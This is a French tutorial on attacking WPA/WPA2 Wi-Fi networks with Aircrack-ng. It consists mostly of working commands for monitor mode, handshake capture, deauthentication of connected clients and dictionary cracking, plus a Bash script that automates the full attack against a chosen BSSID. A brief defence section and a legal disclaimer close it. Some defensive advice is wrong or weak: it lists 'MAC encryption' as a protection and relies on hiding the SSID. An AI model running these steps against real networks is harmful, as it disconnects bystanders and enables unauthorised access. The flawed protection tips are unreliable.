Attaque de Réseau Sans Fil avec Aircrack-ng
Ce tutoriel vous guide à travers les étapes nécessaires pour effectuer une attaque de réseau Wi-Fi avec la suite Aircrack-ng. L'objectif est de capturer des paquets, les analyser et tenter de craquer un mot de passe Wi-Fi.
Introduction
Aircrack-ng est un ensemble d'outils permettant d'évaluer la sécurité des réseaux Wi-Fi. Il est principalement utilisé pour capturer des paquets et tenter de récupérer des mots de passe WEP/WPA/WPA2.
Prérequis
- ✅ Un ordinateur sous Kali Linux ou une distribution compatible
- ✅ Une carte Wi-Fi supportant l'injection de paquets (comme Atheros, Ralink)
- ✅ Aircrack-ng installé (inclus par défaut sous Kali Linux)
- ✅ Une liste de mots de passe (dictionnaire) pour le crackage
Étape 1: Vérification et Passage en Mode Monitor
Commencez par vérifier les interfaces disponibles :
iwconfig
Ensuite, activez le mode monitor sur votre interface Wi-Fi :
airmon-ng check kill
airmon-ng start wlan0
Étape 2: Capture des Paquets
Utilisez `airodump-ng` pour voir les réseaux disponibles et capturer les paquets :
airodump-ng wlan0mon
Pour capturer sur un canal spécifique :
airodump-ng --channel [CH] wlan0mon
Étape 3: Capture d'un Handshake WPA/WPA2
Ciblez un réseau particulier pour capturer le handshake :
airodump-ng --bssid [BSSID] --channel [CH] --write capture wlan0mon
Étape 4: Déconnexion des Clients (Forcer le Handshake)
Pour forcer un client à se reconnecter et capturer le handshake :
aireplay-ng --deauth 10 -a [BSSID] wlan0mon
Si cela ne fonctionne pas, essayez de cibler un client spécifique :
aireplay-ng --deauth 10 -a [BSSID] -c [CLIENT_MAC] wlan0mon
Étape 5: Crackage du Mot de Passe
Utilisez `aircrack-ng` avec un dictionnaire pour tenter de craquer le mot de passe :
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b [BSSID] capture-01.cap
Pour améliorer le crackage, vous pouvez utiliser plusieurs dictionnaires ou générateurs de mots de passe :
aircrack-ng -w /path/to/another-dict.txt -w /path/to/rockyou.txt -b [BSSID] capture-01.cap
🔧 Automatisation avec un Script Bash
Voici un script Bash amélioré pour automatiser l'attaque :
#!/bin/bash
airmon-ng check kill
airmon-ng start wlan0
airodump-ng wlan0mon &
sleep 5
pkill airodump-ng
airodump-ng --bssid $1 --channel $2 --write capture wlan0mon &
sleep 10
aireplay-ng --deauth 10 -a $1 wlan0mon
sleep 5
pkill airodump-ng
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b $1 capture-01.cap
Exécution : chmod +x attaque_wifi.sh && ./attaque_wifi.sh [BSSID] [CH]
⚠️ Problèmes Courants et Solutions
- 🚨 **Interface Wi-Fi non détectée** : Vérifiez avec `lsusb` et `lsmod` pour voir si votre carte est reconnue et si les modules nécessaires sont chargés.
- ⚠️ **Pas de handshake capturé** : Augmentez le nombre de déauthentifications, changez de position pour améliorer le signal, ou essayez avec un autre client.
- ⛔ **Mot de passe non trouvé** : Utilisez un dictionnaire plus grand, combinez plusieurs dictionnaires, ou utilisez des outils comme `hashcat` pour des attaques plus avancées.
- 🛑 **Problèmes de compatibilité carte Wi-Fi** : Consultez la documentation de votre carte Wi-Fi pour vérifier les pilotes et la compatibilité avec l'injection.
🛡️ Comment se Protéger de ces Attaques ?
- ✅ Utilisez WPA3 si possible pour une meilleure sécurité.
- ✅ Mots de passe complexes, longs et non-dictionnairisés.
- ✅ Désactivation du WPS et du SSID broadcast si non nécessaire.
- ✅ Chiffrement MAC pour limiter les connexions aux appareils connus.
- ✅ Surveillance active du réseau avec des outils comme Wireshark.
⚖️ Avertissement Légal
Ce tutoriel est fourni à des fins éducatives uniquement. Il est **illégal** d'attaquer un réseau sans autorisation.
Conclusion
Nous avons détaillé comment utiliser Aircrack-ng pour évaluer la sécurité des réseaux Wi-Fi. Ces connaissances doivent être utilisées de manière éthique, dans un cadre légal.